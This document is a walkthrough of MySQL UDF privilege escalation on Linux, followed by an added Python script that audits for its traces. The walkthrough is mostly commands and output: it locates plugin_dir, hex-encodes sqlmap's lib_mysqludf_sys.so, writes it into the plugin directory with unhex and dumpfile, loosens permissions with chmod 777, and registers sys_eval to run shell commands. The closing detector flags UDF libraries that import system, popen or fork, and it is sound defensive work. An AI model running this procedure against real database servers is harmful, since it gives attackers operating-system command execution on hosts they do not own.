Environment:
OS: Linux (BT5)
Database: MySQL
Briefly:
A custom library function (a UDF, user-defined function) is used to run arbitrary programs. Only Linux is tested here; on Windows the library is a DLL, so the details naturally differ.
Requirements:
The mysql database must contain the func table, and UDFs are disabled when --skip-grant-tables is enabled.
Process: get the plugin library path, find the UDF library file for the operating system, then use the UDF library file to load a function and execute commands.
1. Get the plugin library path
mysql> show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value                 |
+---------------+-----------------------+
| plugin_dir    | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)
2. Find the UDF library file for the operating system
Since this is my own test machine, I checked the system version: it is 64-bit.
root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 10:34:20 EST x86_64
UDF library files ship with the sqlmap tool; just find the one that matches the operating system version.
root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so
3. Use the UDF library file to load functions and execute commands
First get the hexadecimal form of the UDF library file, which can be done locally:
mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)
In my test the MySQL server runs under the mysql account, not root, so it cannot write to the plugin directory. In practice, UDF privilege escalation generally targets a MySQL server that was started with root privileges, so the problem of insufficient directory permissions does not arise there. To continue the test, modify the directory permissions:
root@bt:~# chmod 777 /usr/lib/mysql/plugin
Write the UDF library from the database into the MySQL plugin directory:
mysql> select unhex('7f454c46020 ...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)
View the functions exported by this UDF library:
root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
                 w _Jv_RegisterClasses
0000000000201788 A __bss_start
                 w __cxa_finalize
                 w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
                 U fgets
                 U fork
                 U free
                 U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
                 U malloc
                 U mmap
                 U pclose
                 U popen
                 U realloc
                 U setenv
                 U strcpy
                 U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
                 U sysconf
                 U system
                 U waitpid
Finally, load the function and execute a command:
mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql              |
+--------------------+
1 row in set (0.04 sec)
mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name     | ret | dl          | type     |
+----------+-----+-------------+----------+
| sys_eval |   0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set
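
The three artifacts this walkthrough leaves behind (a plugin library that imports process-spawning libc calls, a row in mysql.func, and a world-writable plugin_dir) can be checked for from the defender's side. The following is an added example, not part of the original article; the function names parse_nm, udf_names and audit are hypothetical, and the sample inputs are constructed from the output shown above.

```python
import re

# libc imports that let a shared object spawn processes; all three appear in the nm listing above.
EXEC_IMPORTS = {"system", "popen", "fork"}
NM_LINE = re.compile(r"^\s*(?:[0-9a-fA-F]{8,16}\s+)?([A-Za-z])\s+(\S+)\s*$")

def parse_nm(text):
    """Split `nm -D` output into (undefined imports, exported text symbols)."""
    imports, exports = set(), set()
    for line in text.splitlines():
        m = NM_LINE.match(line)
        if m and m.group(1) == "U":
            imports.add(m.group(2))
        elif m and m.group(1) == "T":
            exports.add(m.group(2))
    return imports, exports

def udf_names(exports):
    """Heuristic (assumption): an export xxx with an xxx_init companion is a UDF entry point."""
    return sorted(n for n in exports if n + "_init" in exports)

def audit(library, nm_text, func_rows, plugin_dir_mode):
    """Return findings for one plugin library, the mysql.func rows and the plugin_dir mode."""
    imports, exports = parse_nm(nm_text)
    risky, udfs = sorted(imports & EXEC_IMPORTS), udf_names(exports)
    findings = []
    if risky and udfs:
        findings.append(f"{library}: UDFs {udfs} can spawn processes via {risky}")
    for name, _ret, dl, _type in func_rows:
        if dl == library and name in udfs and risky:
            findings.append(f"mysql.func registers {name} from {library}")
    if plugin_dir_mode & 0o002:  # "other" write bit, set by the chmod 777 above
        findings.append(f"plugin_dir is world-writable (mode {plugin_dir_mode:o})")
    return findings

# Constructed sample inputs, shortened from the output shown on this page.
SAMPLE_NM = """\
                 U popen
                 U system
0000000000000e46 T sys_eval
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000f57 T sys_exec_init
"""
SAMPLE_FUNC = [("sys_eval", 0, "mysqludf.so", "function")]

if __name__ == "__main__":
    print(*audit("mysqludf.so", SAMPLE_NM, SAMPLE_FUNC, 0o777), sep="\n")
```

On a live host the inputs would come from nm -D run on each file in plugin_dir, select * from mysql.func, and a stat of the directory.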